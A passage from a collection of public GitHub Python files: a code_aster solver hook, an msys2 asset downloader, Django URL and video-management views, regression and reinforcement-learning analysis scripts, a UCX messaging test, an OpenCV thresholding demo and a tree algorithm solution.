phys_pb.getListOfLoads().addContactLoadDescriptor(fed_defi, None)\n\n solver.use(contact_manager)\n\n # Add stepper\n timeStepper = TimeStepper.from_keywords(**args[\"INCREMENT\"][0])\n solver.use(timeStepper)\n\n # Add Hook\n class PostHookHHO:\n \"\"\"User object to be used as a PostStepHook.\"\"\"\n\n provide = SOP.PostStepHook\n\n def __call__(self, nl_solver):\n \"\"\"Hook to compute HHO_DEPL\"\"\"\n\n if nl_solver.phys_pb.getModel().existsHHO():\n hho_field = HHO(nl_solver.phys_pb).projectOnLagrangeSpace(\n nl_solver.phys_state.primal_curr\n )\n storage_manager = nl_solver.get_feature(SOP.Storage)\n storage_manager.storeField(hho_field, \"HHO_DEPL\", nl_solver.phys_state.time_curr)\n\n solver.use(PostHookHHO())\n\n # Run computation\n solver.run()\n print_stats()\n reset_stats()\n return solver.result\n","repo_name":"Krande/code-aster-copy","sub_path":"code_aster/MacroCommands/meca_non_line_ops.py","file_name":"meca_non_line_ops.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38566706848","text":"import fnmatch\nimport os\nfrom concurrent.futures import ThreadPoolExecutor\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Tuple\n\nfrom github.GitReleaseAsset import GitReleaseAsset\n\nfrom .config import BuildType, Config\nfrom .gh import (CachedAssets, download_asset, get_asset_filename,\n get_asset_mtime_ns, is_asset_from_gha, get_asset_uploader_name)\nfrom .queue import PackageStatus, get_buildqueue_with_status\nfrom .utils import ask_yes_no\n\n\ndef get_repo_subdir(build_type: BuildType) -> Path:\n if build_type in Config.MSYS_ARCH_LIST:\n return Path(\"msys\") / \"x86_64\"\n elif build_type == Config.MSYS_SRC_BUILD_TYPE:\n return Path(\"msys\") / \"sources\"\n elif build_type == Config.MINGW_SRC_BUILD_TYPE:\n return Path(\"mingw\") / \"sources\"\n elif build_type in Config.MINGW_ARCH_LIST:\n return Path(\"mingw\") / build_type\n else:\n raise Exception(\"unknown type\")\n\n\ndef fetch_assets(args: Any) -> None:\n target_dir = os.path.abspath(args.targetdir)\n fetch_all = args.fetch_all\n fetch_complete = args.fetch_complete\n\n all_patterns: Dict[BuildType, List[str]] = {}\n all_blocked = []\n for pkg in get_buildqueue_with_status():\n for build_type in pkg.get_build_types():\n if args.build_type and build_type not in args.build_type:\n continue\n status = pkg.get_status(build_type)\n pkg_patterns = pkg.get_build_patterns(build_type)\n if status == PackageStatus.FINISHED:\n all_patterns.setdefault(build_type, []).extend(pkg_patterns)\n elif status in [PackageStatus.FINISHED_BUT_BLOCKED,\n PackageStatus.FINISHED_BUT_INCOMPLETE]:\n if fetch_all or (fetch_complete and status != PackageStatus.FINISHED_BUT_INCOMPLETE):\n all_patterns.setdefault(build_type, []).extend(pkg_patterns)\n else:\n all_blocked.append(\n (pkg[\"name\"], build_type, pkg.get_status_details(build_type)))\n\n all_assets = {}\n cached_assets = CachedAssets()\n assets_to_download: Dict[BuildType, List[GitReleaseAsset]] = {}\n for build_type, patterns in all_patterns.items():\n if build_type not in all_assets:\n all_assets[build_type] = cached_assets.get_assets(build_type)\n assets = all_assets[build_type]\n\n assets_mapping: Dict[str, List[GitReleaseAsset]] = {}\n for asset in assets:\n assets_mapping.setdefault(get_asset_filename(asset), []).append(asset)\n\n for pattern in patterns:\n matches = fnmatch.filter(assets_mapping.keys(), pattern)\n if matches:\n found = assets_mapping[matches[0]]\n assets_to_download.setdefault(build_type, []).extend(found)\n\n to_fetch = {}\n for build_type, assets in assets_to_download.items():\n for asset in assets:\n asset_dir = Path(target_dir) / get_repo_subdir(build_type)\n asset_path = asset_dir / get_asset_filename(asset)\n to_fetch[str(asset_path)] = asset\n\n if not args.noconfirm:\n for path, asset in to_fetch.items():\n if not is_asset_from_gha(asset):\n if not ask_yes_no(f\"WARNING: {get_asset_filename(asset)!r} is a manual upload \"\n f\"from {get_asset_uploader_name(asset)!r}, continue?\"):\n raise SystemExit(\"aborting\")\n\n def file_is_uptodate(path: str, asset: GitReleaseAsset) -> bool:\n asset_path = Path(path)\n if not asset_path.exists():\n return False\n if asset_path.stat().st_size != asset.size:\n return False\n if get_asset_mtime_ns(asset) != asset_path.stat().st_mtime_ns:\n return False\n return True\n\n # find files that are either wrong or not what we want\n to_delete = []\n not_uptodate = []\n for root, dirs, files in os.walk(target_dir):\n for name in files:\n existing = os.path.join(root, name)\n if existing in to_fetch:\n asset = to_fetch[existing]\n if not file_is_uptodate(existing, asset):\n to_delete.append(existing)\n not_uptodate.append(existing)\n else:\n to_delete.append(existing)\n\n if args.delete and not args.pretend:\n # delete unwanted files\n for path in to_delete:\n os.remove(path)\n\n # delete empty directories\n for root, dirs, files in os.walk(target_dir, topdown=False):\n for name in dirs:\n path = os.path.join(root, name)\n if not os.listdir(path):\n os.rmdir(path)\n\n # Finally figure out what to download\n todo = {}\n done = []\n for path, asset in to_fetch.items():\n if not os.path.exists(path) or path in not_uptodate:\n todo[path] = asset\n Path(path).parent.mkdir(parents=True, exist_ok=True)\n else:\n done.append(path)\n\n if args.verbose and all_blocked:\n import pprint\n print(\"Packages that are blocked and why:\")\n pprint.pprint(all_blocked)\n\n print(f\"downloading: {len(todo)}, done: {len(done)} \"\n f\"blocked: {len(all_blocked)} (related builds missing)\")\n\n print(\"Pass --verbose to see the list of blocked packages.\")\n print(\"Pass --fetch-complete to also fetch blocked but complete packages\")\n print(\"Pass --fetch-all to fetch all packages.\")\n print(\"Pass --delete to clear the target directory\")\n\n def fetch_item(item: Tuple[str, GitReleaseAsset]) -> Tuple[str, GitReleaseAsset]:\n asset_path, asset = item\n if not args.pretend:\n download_asset(asset, asset_path)\n return item\n\n with ThreadPoolExecutor(8) as executor:\n for i, item in enumerate(executor.map(fetch_item, todo.items())):\n print(f\"[{i + 1}/{len(todo)}] {get_asset_filename(item[1])}\")\n\n print(\"done\")\n\n\ndef add_parser(subparsers: Any) -> None:\n sub = subparsers.add_parser(\n \"fetch-assets\", help=\"Download all staging packages\", allow_abbrev=False)\n sub.add_argument(\"targetdir\")\n sub.add_argument(\n \"--delete\", action=\"store_true\", help=\"Clear targetdir of unneeded files\")\n sub.add_argument(\n \"--verbose\", action=\"store_true\", help=\"Show why things are blocked\")\n sub.add_argument(\n \"--pretend\", action=\"store_true\",\n help=\"Don't actually download, just show what would be done\")\n sub.add_argument(\n \"--fetch-all\", action=\"store_true\", help=\"Fetch all packages, even blocked ones\")\n sub.add_argument(\n \"--fetch-complete\", action=\"store_true\",\n help=\"Fetch all packages, even blocked ones, except incomplete ones\")\n sub.add_argument(\n \"-t\", \"--build-type\", action=\"append\",\n help=\"Only fetch packages for given build type(s) (may be used more than once)\")\n sub.add_argument(\n \"--noconfirm\", action=\"store_true\",\n help=\"Don't require user confirmation\")\n sub.set_defaults(func=fetch_assets)\n","repo_name":"msys2/msys2-autobuild","sub_path":"msys2_autobuild/cmd_fetch_assets.py","file_name":"cmd_fetch_assets.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"72"} +{"seq_id":"10113325905","text":"from django.urls import path, include\n\nfrom doctor.views import search, DoctorListView, profile, doctor_panel, doctor_expertise, doctor_request, doctor_visit\n\nurlpatterns = [\n path('search/', search, name='search'),\n path('visit//', doctor_visit, name='doctor_visit'),\n path('request/', doctor_request, name='doctor_request'),\n path('/', profile, name='doctor'),\n path('/panel/', doctor_panel, name='doctor_panel'),\n path('/panel/expertise/', doctor_expertise, name='doctor_expertise'),\n]","repo_name":"SalarKesha/SE-project","sub_path":"doctor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73840310313","text":"import numpy as np\nimport seaborn as sns\n\nfrom imageio import imread\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\nimport scipy.linalg as scl\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\n# /////// Functions /////// \n\ndef Designmatrix(x, y, n=5):\n \"\"\" \n create a design matrix dependent on the polynomial grade you want, with a base of 3.\n want the collumns of X to be [1, x, y, x^2, xy, y^2, x^3, x^2y, xy^2, y^3]\n and so on. \n \"\"\"\n if len(x.shape) > 1:\n x = np.ravel(x)\n y = np.ravel(y)\n\n N = len(x)\n l = int( (n+1)*(n+2)/2 ) # nr. of elements in beta\n X = np.ones((N,l))\n\n for i in range(1, n+1):\n q = int( (i)*(i+1)/2 )\n for k in range(i+1):\n X[:, q+k] = x**(i-k) * y**k\n \n return X\n\ndef SVDinv(A):\n \"\"\"\n Takes as input a numpy matrix A and returns inv(A) based on singular value decomposition (SVD).\n SVD is numerically more stable than the inversion algorithms provided by\n numpy and scipy.linalg at the cost of being slower.\n \n taken from Regressinon slides at https://compphysics.github.io/MachineLearning/doc/pub/Regression/html/Regression.html\n with some modifications\n \"\"\"\n U, s, VT = np.linalg.svd(A)\n D = np.zeros((len(U),len(VT)))\n for i in range(0,len(VT)):\n D[i,i]=s[i]\n return VT.T @ ( np.linalg.inv(D) @ U.T )\n# /////// !Functions /////// \n\n# Load the terrain\nterrain1 = imread('../resources/SRTM_data_Norway_1.tif')\n\n# make training arrays \nleny, lenx = terrain1.shape\nxarr = np.linspace(0, 1, lenx)\nyarr = np.linspace(0, 1, leny)\n\nxmat, ymat = np.meshgrid(xarr, yarr)\n\n#taking a slice of data for computing time\nnp.random.seed(2039)#this gives an ok approx for MSE, etc. \nN = 100\nstart = np.random.randint(0, 100, 1)[0]\n#print('start at: ', start)\nxmat = xmat[ start:start+N, start:start+N]\nymat = ymat[ start:start+N, start:start+N]\nzmat = terrain1[ start:start+N, start:start+N]\nx = xmat.ravel()\ny = ymat.ravel()\nz = zmat.ravel()\n\n\n#k = 5\n#degrees = np.arange(1, 16)\n#_lambda = np.logspace(-1.7, -1)\n\nk = 2\ndegrees = np.arange(1, 5)\n_lambda = np.logspace(-1.2, -1)\n\nkfold = KFold( n_splits=k, shuffle=True, random_state=5 )\n\n#////////////\nx_train, xvalidation, y_train, yvalidation, z_train, zvalidation = train_test_split(x, y, z, test_size=1./k)\narrsze=len(zvalidation)\n#///////////\n\n\nerror = np.zeros((len(_lambda), len(degrees)))\nbias = np.zeros((len(_lambda), len(degrees)))\nvar = np.zeros((len(_lambda), len(degrees)))\n\nminmse = 2\nlmbdmin = 0\ndegmin = 0\n\nfor lmbd in range(len(_lambda)):\n for deg in degrees:\n zpred = np.empty( (arrsze, k) )\n z_test = np.empty( (arrsze, k) )\n X = Designmatrix(x, y, deg) \n j = 0\n for traininds, testinds in kfold.split(X):\n\n ztrain = z[traininds]\n ztest = z[testinds]\n\n Xtrain = X[traininds]\n Xtest = X[testinds]\n\n XTX = Xtrain.T @ Xtrain\n beta = SVDinv(XTX + _lambda[lmbd]*np.identity(len(XTX))) @ Xtrain.T @ ztrain\n zpred[:,j] = Xtest @ beta\n z_test[:,j] = ztest\n j += 1\n\n error[ lmbd, deg-1 ] = np.mean( np.mean( (z_test - zpred)**2, axis=1, keepdims=True ) ) # mean of k MSE's \n bias[ lmbd, deg-1 ] = np.mean( (z_test - np.mean(zpred, axis=1, keepdims=True))**2 )\n var[ lmbd, deg-1 ] = np.mean( np.var(zpred, axis=1, keepdims=True) )\n if error[lmbd, deg-1] < minmse:\n minmse = error[lmbd, deg-1]\n lmbdmin = lmbd\n degmin = deg\n\nprint('len lambda: ', len(_lambda), '\\nlen degrees: ', len(degrees), '\\nerror.shape: ', error.shape)\n\nax = sns.heatmap(error)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'MSE for complexity and $\\lambda$')\nplt.show()\nax = sns.heatmap(bias)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'bias for complexity and $\\lambda$')\nplt.show()\nax = sns.heatmap(var)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'variance for complexity and $\\lambda$')\nplt.show()\n\n# Unfinished\n#\n#X = Designmatrix(xvalidation, yvalidation, degmin) \n#X_train = Designmatrix(x_train, y_train, degmin)\n#XTX = X_train.T @ X_train\n#beta = SVDinv(XTX + _lambda[lmbdmin]*np.identity(len(XTX))) @ X_train.T @ z_train\n#zpred = X@ beta\n#\n##error = np.mean( (zvalidation - zpred)**2, axis=1, keepdims=True )\n##bias = (zvalidation - np.mean(zpred, axis=1, keepdims=True))**2 \n##var = np.var(zpred, axis=1, keepdims=True)\n##\n##print('\\n=========================', '\\nnordataridge\\n',\n## '\\nBest fit, vs validation set.\\nMSE = ', error, '\\nbias = ', bias, '\\nvariance = ', var, \n## '\\n=====================')\n#zvalidationmat = np.reshape(zvalidation,[70, 70]) \n#zpredmat = np.reshape(zpred,[70, 70]) \n#\n#fig = plt.figure()\n#\n#ax = fig.add_subplot(1, 2, 1, projection='3d')\n#surf = ax.plot_surface(\n# xmat, ymat, zvalidationmat, cmap=cm.coolwarm, linewidth=0, antialiased=False )\n#fig.colorbar(surf, shrink=0.5, aspect=5)\n#plt.title('validation')\n#\n#ax = fig.add_subplot(1, 2, 2, projection='3d')\n#surf = ax.plot_surface(\n# xmat, ymat, zpredmat, cmap=cm.coolwarm, linewidth=0, antialiased=False )\n#fig.colorbar(surf, shrink=0.5, aspect=5)\n#plt.title('fit')\n#plt.show()\n","repo_name":"ageriksen/machinelearning","sub_path":"proj/proj1/src/nordataridge.py","file_name":"nordataridge.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8333697135","text":"import pickle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom insect_rl.mdp.utils import grid_math\nfrom icecream import ic\n\n\n#actions = list(actions)\n#ic(config, actions)\n\ndef convert(df, actions, reward, trap_cost, traps=False):\n\n df[\"state_int\"] = df[[\"path_x\", \"path_y\"]].apply(grid_math.point_to_int, args=(config['width'],), axis=1)\n df[\"next_state_int\"] = df.state_int.shift(-1)\n df[\"next_x\"] = df.path_x.shift(-1)\n df[\"next_y\"] = df.path_y.shift(-1)\n\n df = df.dropna()\n df[\"next_state_int\"] = df.next_state_int.astype('int32')\n df[\"next_x\"] = df.next_x.astype('int32')\n df[\"next_y\"] = df.next_y.astype('int32')\n\n # remove the steps that stay at the same point?\n df = df[df['state_int'] != df['next_state_int']]\n\n def get_action(row):\n return tuple(np.array([row.next_x, row.next_y]) - np.array([row.path_x, row.path_y]))\n\n\n def is_goal(row):\n return (row.next_x, row.next_y) in config['goals']\n\n def is_trap(row):\n return (row.next_x, row.next_y) in config['traps']\n\n new_dfs = []\n actions = list(actions)\n\n by_ant = df.groupby([\"ant_nb\", \"trial_nb\"])\n for (ant,trial), frame in by_ant:\n f = frame.drop(frame.tail(1).index)\n f.next_state_int = f.next_state_int.astype(int)\n f[[\"next_x\", \"next_y\"]] = f[[\"next_x\", \"next_y\"]].astype(int)\n f[\"action\"] = f.apply(get_action, axis=1)\n f[\"action_int\"] = f.action.apply(actions.index)\n f[\"reached_goal\"] = f.apply(is_goal, axis=1)\n f[\"in_trap\"] = f.apply(is_trap, axis=1)\n f[\"reward\"] = 0.0\n f.reward = f.reward.where(~f.reached_goal, reward)\n if traps:\n f.reward = f.reward.where(~f.in_trap, trap_cost)\n\n f.drop([\"path_x\", \"path_y\", \"next_x\", \"next_y\"], axis=1, inplace=True)\n f.reset_index(drop=True, inplace=True)\n reached_goal_idx = f[f.reached_goal].iloc[0].name\n f = f[:reached_goal_idx + 1]\n\n new_dfs.append(f)\n\n df = pd.concat(new_dfs, ignore_index=True)\n\n return df\n\n\ndef compute_J(dataset, gamma=1.):\n \"\"\"\n Compute the cumulative discounted reward of each episode in the dataset.\n\n Args:\n dataset (list): the dataset to consider;\n gamma (float, 1.): discount factor.\n\n Returns:\n The cumulative discounted reward of each episode in the dataset.\n\n \"\"\"\n\n J_trials = []\n n_steps = []\n for trial in pd.unique(dataset[\"trial_nb\"]):\n trial_data = dataset[dataset[\"trial_nb\"] == trial]\n discounted = []\n \n i = len(trial_data.index)\n n_steps.append(len(trial_data.index))\n for step in reversed(trial_data.index):\n i -= 1\n J = gamma ** i * trial_data.reward[step]\n #print(i, step)\n discounted.append(J)\n J_trials.append(sum(discounted))\n return J_trials[0], n_steps\n\n\n\nwith open(snakemake.input.env[0], 'rb') as config_file:\n config = pickle.load(config_file)\nactions = vars(grid_math)[snakemake.config['actions']]\nreward = float(snakemake.wildcards.reward)\ntrap_cost = float(snakemake.wildcards.trapcost)\n\ndf_nt = pd.read_csv(snakemake.input[0])\ndf_nt = convert(df_nt, actions, reward, trap_cost)\ndf_nt = df_nt.reset_index(drop=True)\n#df.to_csv(snakemake.output[0], index=False)\n\nJs_no_trap = []\nn_steps_no_trap = []\nfor ant in pd.unique(df_nt[\"ant_nb\"]):\n ant_df = df_nt[df_nt[\"ant_nb\"] == ant]\n J, n_steps = compute_J(ant_df, gamma=snakemake.config[\"simulation_settings\"][\"discount_factor\"])\n Js_no_trap.append(J)\n n_steps_no_trap.append(n_steps)\n#np.save(snakemake.output[0], Js_no_trap)\nplt.plot(Js_no_trap)\nplt.title(\"Cumulative discounted rewards without trap\")\nplt.savefig(snakemake.output[0])\nplt.clf()\n\n####### trap\ndf_t = pd.read_csv(snakemake.input[1])\ndf_t = convert(df_t, actions, reward, trap_cost, traps=True)\ndf_t = df_t.reset_index(drop=True)\n\nJs_trap = []\nn_steps_trap = []\nfor ant in pd.unique(df_t[\"ant_nb\"]):\n ant_df = df_t[df_t[\"ant_nb\"] == ant]\n J, n_steps = compute_J(ant_df, gamma=snakemake.config[\"simulation_settings\"][\"discount_factor\"])\n Js_trap.append(J)\n n_steps_trap.append(n_steps)\n\nplt.plot(Js_trap)\nplt.title(\"Cumulative discounted rewards with trap\")\nplt.savefig(snakemake.output[1])\nplt.clf()\n#plt.show()\n\nn_steps_no_trap = [np.mean(ant) for ant in n_steps_no_trap]\nn_steps_trap = [np.mean(ant) for ant in n_steps_trap]\n#plt.plot(n_steps_trap)\nplt.title(\"Number of steps per trial\")\nplt.boxplot([n_steps_no_trap, n_steps_trap], labels=[\"no trap\", \"trap\"])\n#plt.show()\nplt.savefig(snakemake.output[2])\n","repo_name":"PaulinaFriemann/RL-InsectNavigation","sub_path":"v2/forward/workflow/scripts/convert_dataframe.py","file_name":"convert_dataframe.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18241927554","text":"import asyncio\nfrom functools import partial\n\nimport numpy as np\nimport pytest\n\nimport ucp\n\nmsg_sizes = [0] + [2**i for i in range(0, 25, 4)]\n\n\ndef _bytearray_assert_equal(a, b):\n assert a == b\n\n\ndef get_data():\n ret = [\n {\n \"allocator\": bytearray,\n \"generator\": lambda n: bytearray(b\"m\" * n),\n \"validator\": lambda recv, exp: _bytearray_assert_equal(recv, exp),\n \"memory_type\": \"host\",\n },\n {\n \"allocator\": partial(np.ones, dtype=np.uint8),\n \"generator\": partial(np.arange, dtype=np.int64),\n \"validator\": lambda recv, exp: np.testing.assert_equal(\n recv.view(np.int64), exp\n ),\n \"memory_type\": \"host\",\n },\n ]\n\n try:\n import cupy as cp\n\n ret.append(\n {\n \"allocator\": partial(cp.ones, dtype=np.uint8),\n \"generator\": partial(cp.arange, dtype=np.int64),\n \"validator\": lambda recv, exp: cp.testing.assert_array_equal(\n recv.view(np.int64), exp\n ),\n \"memory_type\": \"cuda\",\n }\n )\n except ImportError:\n pass\n\n return ret\n\n\ndef simple_server(size, recv):\n async def server(ep):\n recv = await ep.am_recv()\n await ep.am_send(recv)\n await ep.close()\n\n return server\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"size\", msg_sizes)\n@pytest.mark.parametrize(\"blocking_progress_mode\", [True, False])\n@pytest.mark.parametrize(\"recv_wait\", [True, False])\n@pytest.mark.parametrize(\"data\", get_data())\nasync def test_send_recv_am(size, blocking_progress_mode, recv_wait, data):\n rndv_thresh = 8192\n ucp.init(\n options={\"RNDV_THRESH\": str(rndv_thresh)},\n blocking_progress_mode=blocking_progress_mode,\n )\n\n ucp.register_am_allocator(data[\"allocator\"], data[\"memory_type\"])\n msg = data[\"generator\"](size)\n\n recv = []\n listener = ucp.create_listener(simple_server(size, recv))\n num_clients = 1\n clients = [\n await ucp.create_endpoint(ucp.get_address(), listener.port)\n for i in range(num_clients)\n ]\n for c in clients:\n if recv_wait:\n # By sleeping here we ensure that the listener's\n # ep.am_recv call will have to wait, rather than return\n # immediately as receive data is already available.\n await asyncio.sleep(1)\n await c.am_send(msg)\n recv_msg = await c.am_recv()\n for c in clients:\n await c.close()\n listener.close()\n\n if data[\"memory_type\"] == \"cuda\" and msg.nbytes < rndv_thresh:\n # Eager messages are always received on the host, if no host\n # allocator is registered UCX-Py defaults to `bytearray`.\n assert recv_msg == bytearray(msg.get())\n else:\n data[\"validator\"](recv_msg, msg)\n","repo_name":"rapidsai/ucx-py","sub_path":"tests/test_send_recv_am.py","file_name":"test_send_recv_am.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"72"} +{"seq_id":"15332967024","text":"import cv2 as cv\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimg = cv.imread('sample_images/ImagesOriginalSize/Scol/N93, Rt TL AIS, F, 14 Yrs.jpg', cv.IMREAD_GRAYSCALE)\nassert img is not None, \"file could not be read, check with os.path.exists()\"\n\nC = 6\nAR = 5\n\n#img = cv.medianBlur(img,5)\nret,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\nth2 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_MEAN_C,\\\n cv.THRESH_BINARY_INV,AR,C)\nth3 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv.THRESH_BINARY_INV,AR,C)\n\nedges1 = cv.Canny(img,50,100)\nedges2 = cv.Canny(th2,100,200)\nedges3 = cv.Canny(th3,100,200)\n\ndf = pd.DataFrame(edges1).replace(255, 1)\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding', 'Canny Original', 'Canny MEAN', 'Canny GAUSSIAN', 'MEANS']\nimages = [img, th1, th2, th3, edges1, edges2, edges3]\nfor i in range(len(images)):\n plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\nplt.show()\n","repo_name":"pedromartinssouza/escoliosis-diagnoser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2099299425","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @return: the root of the minimum subtree\n \"\"\"\n def findSubtree(self, root):\n # write your code here\n if not root:\n return\n node, rootSum, minSum = self.dfs(root)\n return node\n \n def dfs(self, node):\n if not node:\n return (None, 0, float('inf'))\n (leftMinNode, leftSum, leftMinSum), (rightMinNode, rightSum, rightMinSum) = self.dfs(node.left), self.dfs(node.right)\n minSum = min(leftMinSum, rightMinSum, node.val + leftSum + rightSum)\n\n if minSum == node.val + leftSum + rightSum:\n return (node, minSum, minSum)\n if minSum == leftMinSum:\n return (leftMinNode, node.val + leftSum + rightSum, minSum)\n if minSum == rightMinSum:\n return (rightMinNode, node.val + leftSum + rightSum, minSum)\n","repo_name":"GuanYangCLU/AlgoTestForPython","sub_path":"LintCode/ladder/chapter_5/0596_Minimum_Subtree.py","file_name":"0596_Minimum_Subtree.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74670523432","text":"import math\nimport time\nimport traceback\nimport uuid\nfrom datetime import date\nimport random\n\nfrom django.core.exceptions import BadRequest, ObjectDoesNotExist\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.files.storage import FileSystemStorage\n\nfrom .models import Video, Labels, VideoLabels, DeleteRequests\nfrom .video_manager import *\n\n\ndef update_views(video_id=-1):\n \"\"\"\n Update views in the labels table. This will enable to do recommendations based upon views\n :param video_id:\n -1 - (Hard update): This will check for every video and update the category accordingly.\n Used when new video is deleted or labels are changed.\n video_id - (Soft update): This will just update the rows relevant to the given video\n Used when a video is watched.\n :return: None\n \"\"\"\n if video_id == -1:\n label_ids = [elements['id'] for elements in Labels.objects.values(\"id\")]\n\n for label in label_ids:\n total_views = 0\n videos = VideoLabels.objects.filter(label=label).values()\n for video in videos:\n current_video_id = video['video']\n video_obj = Video.objects.filter(id=current_video_id)\n views = video_obj.get().views\n total_views += views\n\n label_obj = Labels.objects.get(id=label)\n label_obj.views = total_views\n label_obj.save()\n print(\"Updated total views\")\n\n else:\n vid_labels = VideoLabels.objects.filter(video=video_id).values()\n\n for vid_label in vid_labels:\n label_id = vid_label['label']\n label_obj = Labels.objects.get(id=label_id)\n label_obj.views += 1\n label_obj.save()\n\n\ndef get_label_ids(_labels):\n label_ids = []\n for curr_label in _labels:\n if curr_label != \"\":\n if Labels.objects.filter(label=curr_label).exists():\n label_ids.append(Labels.objects.get(label=curr_label).id)\n return label_ids\n\n\ndef get_set_label_ids(_labels):\n label_ids = []\n for curr_label in _labels:\n if curr_label != \"\":\n if Labels.objects.filter(label=curr_label).exists():\n label_ids.append(Labels.objects.get(label=curr_label).id)\n else:\n lab_obj = Labels.objects.create(label=curr_label, views=0)\n lab_obj.save()\n label_ids.append(Labels.objects.get(label=curr_label).id)\n\n return label_ids\n\n\ndef save_labels(video_id, label_ids):\n vid_label_obj = VideoLabels.objects.filter(video=video_id)\n if len(vid_label_obj) != 0:\n for curr_obj in vid_label_obj:\n curr_obj.delete()\n\n for curr_id in label_ids:\n vid_lbl_obj = VideoLabels.objects.create(video=video_id, label=curr_id)\n vid_lbl_obj.save()\n update_views()\n\n\ndef check_label_is_used(label):\n label_id = Labels.objects.get(label=label).id\n return VideoLabels.objects.filter(label=label_id).exists()\n\n\ndef video_object(videos, request):\n data = []\n host = request.get_host()\n for video in videos:\n data.append({\n \"id\": video.id,\n \"title\": video.title,\n \"preview\": host + \"/\" + video.prev_loc,\n \"thumbnail\": host + \"/\" + video.thumb_loc,\n \"length\": video.length,\n \"views\": video.views\n })\n return data\n\n\ndef video_sets_creator(videos):\n data = []\n for video in videos:\n data.append((video.id, video.title, video.location, \"/\" + video.prev_loc, \"/\" + video.thumb_loc, video.date, video.length, video.views))\n return data\n\n\ndef recommendations_creator():\n most_viewed_labels = [label_id['id'] for label_id in Labels.objects.all().order_by('-views').values()[:3]]\n least_viewed_labels = [label_id['id'] for label_id in Labels.objects.all().order_by('views').values()[:3]]\n recommended_videos = []\n\n for label in most_viewed_labels:\n current_videos = VideoLabels.objects.filter(label=label)\n videos_in_the_label = [obj.video for obj in current_videos]\n random.shuffle(videos_in_the_label)\n\n for video in videos_in_the_label:\n if video not in recommended_videos:\n recommended_videos.append(video)\n break\n\n for label in least_viewed_labels:\n current_videos = VideoLabels.objects.filter(label=label)\n videos_in_the_label = [obj.video for obj in current_videos]\n random.shuffle(videos_in_the_label)\n\n for video in videos_in_the_label:\n if video not in recommended_videos:\n recommended_videos.append(video)\n break\n return recommended_videos\n\n\ndef recommendations(request):\n recommended = recommendations_creator()\n videos = []\n for video in recommended:\n videos.append(Video.objects.get(id=video))\n data_dict = {\"data\": video_object(videos, request)}\n return JsonResponse(data_dict)\n\n\ndef labels(request):\n if request.method == \"GET\":\n get_body = request.GET\n labels_list = get_body.getlist('labels')\n if len(labels_list) == 0 and 'video-id' not in get_body and 'remove' not in get_body:\n _labels = Labels.objects.values('label').order_by('label')\n return JsonResponse({\"labels\": [label['label'] for label in _labels]})\n\n label_ids = get_set_label_ids(labels_list)\n if 'video-id' in get_body:\n try:\n req_id = int(request.GET['video-id'])\n Video.objects.get(id=req_id)\n except ValueError:\n raise BadRequest(\"Invalid Request\")\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid video id\")\n\n print(label_ids)\n save_labels(req_id, label_ids)\n\n return HttpResponse(\"OK\")\n\n try:\n if not check_label_is_used(request.GET['remove']):\n label = Labels.objects.get(label=request.GET['remove'])\n label.delete()\n return HttpResponse(\"OK\")\n else:\n return HttpResponse(\"Label is already in use\", status=400)\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid label to remove\")\n except MultiValueDictKeyError:\n raise BadRequest()\n\n\ndef video_remover(vid_id):\n if Video.objects.filter(id=vid_id).exists():\n vid_labels = VideoLabels.objects.filter(video=vid_id)\n for curr_label in vid_labels:\n curr_label.delete()\n\n video = Video.objects.get(id=vid_id)\n video_path = os.path.dirname(video.location)[:-5]\n video.delete()\n remove_folder(video_path)\n return True\n else:\n return False\n\n\ndef delete_videos(request):\n if request.method == \"GET\":\n get_body = request.GET\n if 'video-id' in get_body:\n unique_id = str(uuid.uuid4().hex)\n seconds = int(time.time())\n\n try:\n req_id = int(get_body['video-id'])\n except ValueError:\n raise BadRequest(\"Invalid video id\")\n\n del_req = DeleteRequests(unique_id, req_id, 